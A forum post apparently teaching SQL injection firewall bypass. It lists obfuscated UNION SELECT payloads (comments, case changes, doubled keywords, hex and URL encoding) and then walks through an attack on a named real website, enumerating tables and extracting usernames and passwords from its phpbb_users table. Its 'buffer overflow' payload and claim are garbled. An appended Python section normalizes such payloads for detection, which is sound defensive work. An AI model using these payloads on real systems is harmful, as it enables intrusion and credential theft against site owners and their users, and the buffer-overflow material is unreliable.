Symbianize Forum


SQLi WAF ByPass

eras

:nerd: :nerd: :nerd: **SQLi WAF ByPass** :nerd: :nerd: :nerd:

What is a WAF?
WAF (Web Application Firewall)

- it detects and defends a site against SQLi attacks.. [that's my straightforward explanation...]

How do you know if a site has a WAF?
- it's easy to tell: when you enter a command via SQL Injection, usually the "UNION SELECT" command,
an error like this will appear: 403 Error ["Forbidden" or "Not Acceptable"].
-=[ WAF Bypassing Techniques ]=-

1] Comments - this is the first method for bypassing a WAF. [This one is just basic]
It goes like this:
/*!UNION*/ /*!SELECT*/
http://www.voltsx.cia.org/index.php?id=-13 /*!UNION*/ /*!SELECT*/ 1,2,3--

2] You can change the case of the letters [lowercase or uppercase]
Like this:
uNIoN sELecT
http://www.www.voltsx.cia.org/index.php?id=-13 uNIoN sELecT 1,2,3--

3] You can also combine methods [1] and [2].
- This method is not easily detected by the Web Application Firewall [WAF]
This is the result:
/*!uNIOn*/ /*!SelECt*/
http://www.www.voltsx.cia.org/index.php?id=-13 /*!uNIOn*/ /*!SelECt*/ 1,2,3--

4] Replaced Keywords - sometimes other firewalls remove the "UNION SELECT" statement from the URL.
The exploit function looks like this:
UNIunionON SELselectECT
http://www.www.voltsx.cia.org/index.php?id=-13 UNIunionON SELselectECT 1,2,3--

5] Inline Comments - you can also bypass the firewall using inline comments.
Just put them between the "UNION" and "SELECT" commands.
Something like this:
%55nION/**/%53ElecT
http://www.www.voltsx.cia.org/index.php?id=-13 %55nION/**/%53ElecT 1,2,3--

6] Buffer Overflow / Firewall Crash
- Most firewalls are written in C/C++ and can be bypassed using a BOF [Buffer Overflow].
Like this:
And(select 1)=(select 0x4141414141414141414141414141414141414141414141414141414141414141414141414?14141414141414141414141414141414141414141414141414141414141414141414141414141414?14141414141414141414141414141414141414141414141414141414141414141414141414141414?14141414141414141414141414141414141414141414141414141414141414141414141414141414?14141414141414141414141414141414141414141414141414141414141414141414141414141414?14141414141414141414141414141414141414141414141414141414141414141414141414141414?14141414141414141414141414141414141414141414141414141414141414141414141414141414?14141414141414141414141414141414141414141414141414141414141414141414141414141414?14141414141414141414141414141414141414141414141414141414141414141414141414141414?1414141)+
NOTE: A - hex value 41 (1000x)
or
and (/*!select*/ 1)=(/*!select*/ 0xAA)
http://www.www.voltsx.cia.org/index.php?id=-13 and (/*!select*/ 1)=(/*!select*/ 0xAA) 1,2,3--
or
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
http://www.www.voltsx.cia.org/index.php… 1,2,3--

7] You can also replace characters with their HEX value in the URL.
Like this:
/*!u%6eion*/ /*!se%6cect*/
http://www.www.voltsx.cia.org/index.php?id=-13 /*!u%6eion*/ /*!se%6cect*/ 1,2,3--
Just go here to convert to hex, or use the Firefox add-on [Hackbar]
http://www.swingnote.com/tools/texttohex.php

8] Also change the common SQLi commands
- Apart from the UNION SELECT commands that get blocked by the firewall
- Here are the others:
Forbidden : @@version
Bypassed : version()
Forbidden : concat()
Bypassed : concat_ws()
Forbidden : group_concat()
Bypassed : concat_ws()
and so on ~ ~ ~

9] Here are other things you can use to bypass:
union (select 1,2,3...)--
union (select 111,222,333...)--
uni*on sel*ect
(uNioN) (sElECt)
(uNioN SeleCT)
(UnI)(oN) (SeL)(ecT)
So you understand it better.. I'll show an example of how it's applied...
Ok, let's begin...
Target Site : http://www.gmapinoytv.com.ph/
Vulnerable Link : http://www.gmapinoytv.com.ph/ver1/article.php?aid=64
Let's say we've already got the column count via the ORDER BY command.
Here it is... but it has a firewall..
http://www.gmapinoytv.com.ph/ver1/article.php…--
This is the bypass method...
We just add an open parenthesis [(] at the start of the SELECT command...
And a closing one [)] at the end of the column numbers...
Like this:
UNION+(SELECT+1,2,3)--
ok, here's the actual one:
http://www.gmapinoytv.com.ph/ver1/article.php…--
See, we bypassed the WAF...
As for getting the version, database and current user name...
You already know that hehehe... so I won't show it...
Now let's get the table names...
This is the normal syntax... but it errors/is forbidden because of the WAF installed on the site...
http://www.gmapinoytv.com.ph/ver1/a...chema.tables+WHERE+table_schema=database())--
To bypass it...
You need to remove the GROUP_CONCAT command.. that's what the firewall always blocks...
And note that I also add comments [/**/] in "FROM+information_schema./**/tables/**/"
Here's the complete syntax:
http://www.gmapinoytv.com.ph/ver1/a...*/tables/**/+WHERE+table_schema=database())--
Yeah, we finally bypassed it..
Same goes for getting the column names...
And the username and password...
Here's the syntax for the column names:
http://www.gmapinoytv.com.ph/ver1/article.php…--
For those who don't know yet how I got this: 0x70687062625f7573657273
That's the table name in the site's database: phpbb_users
0x - HEX prefix
70687062625f7573657273 - HEX value of phpbb_users
And here's how to get the username and password:
http://www.gmapinoytv.com.ph/ver1/a..._password),4,5,6,7,8,9,10+FROM+phpbb_users)--
NOTE: It's very important that you study this...
Because most websites now have firewalls.

Credits: Cire Oiger

Happy sharing

~CoDeX

#AllHailPHU
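As an added example, not part of the original post or of any WAF product, here is the canonicalisation a filter has to perform before it matches anything, run over parameter values constructed from the obfuscations listed above (comments, case, URL/hex encoding, %0A, parentheses); `strip_once` is a hypothetical reconstruction of the "remove the keyword" filter that item 4 defeats, included to show why a filter should block rather than strip and forward.

```python
import re
from urllib.parse import unquote_plus

# Constructed parameter values mirroring the obfuscations listed in the post
# (illustrative strings only, not requests to any site).
SAMPLES = {
    "versioned_comments": "-13 /*!UNION*/ /*!SELECT*/ 1,2,3--",
    "mixed_case": "-13 uNIoN sELecT 1,2,3--",
    "inline_comment_urlenc": "-13 %55nION/**/%53ElecT 1,2,3--",
    "newline_version_comment": "-13 %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/ 1,2,3--",
    "hex_inside_keyword": "-13 /*!u%6eion*/ /*!se%6cect*/ 1,2,3--",
    "parenthesised": "-13 UNION+(SELECT+1,2,3)--",
    "benign": "13",
}

# MySQL executes the body of /*!NNNNN ... */ comments, so keep the body;
# ordinary /* ... */ comments act as whitespace, so replace them with a space.
VERSIONED_COMMENT = re.compile(r"/\*!\d{0,5}(.*?)\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)
# After canonicalisation one pattern covers case, encoding, comment placement,
# an optional "all"/"distinct" and surrounding parentheses.
UNION_SELECT = re.compile(r"\bunion\b[\s(]*(?:all|distinct)?[\s(]*\bselect\b")

def normalize(value: str) -> str:
    """Canonicalise a query parameter the way the SQL backend will see it."""
    for _ in range(2):  # decode twice so a double-encoded payload is not missed
        value = unquote_plus(value)  # also turns '+' into a space
    value = VERSIONED_COMMENT.sub(r"\1", value)
    value = PLAIN_COMMENT.sub(" ", value)
    return " ".join(value.lower().split())  # fold case, collapse %0A/%20 runs

def looks_like_union_select(value: str) -> bool:
    """Detection decision: match on the canonical form, never on the raw bytes."""
    return UNION_SELECT.search(normalize(value)) is not None

def strip_once(value: str) -> str:
    """Hypothetical reconstruction of the weak 'remove the keyword' filter from
    item 4: deleting each keyword once is exactly what UNIunionON abuses."""
    for kw in ("union", "select"):
        value = re.sub(kw, "", value, count=1, flags=re.I)
    return value

def scan(samples: dict) -> dict:
    """Return name -> verdict for every constructed sample."""
    return {name: looks_like_union_select(v) for name, v in samples.items()}
```

Feeding the output of `strip_once` back into `looks_like_union_select` shows the stripped request still contains a clean UNION SELECT, which is why a strip-and-forward filter is worse than a plain block.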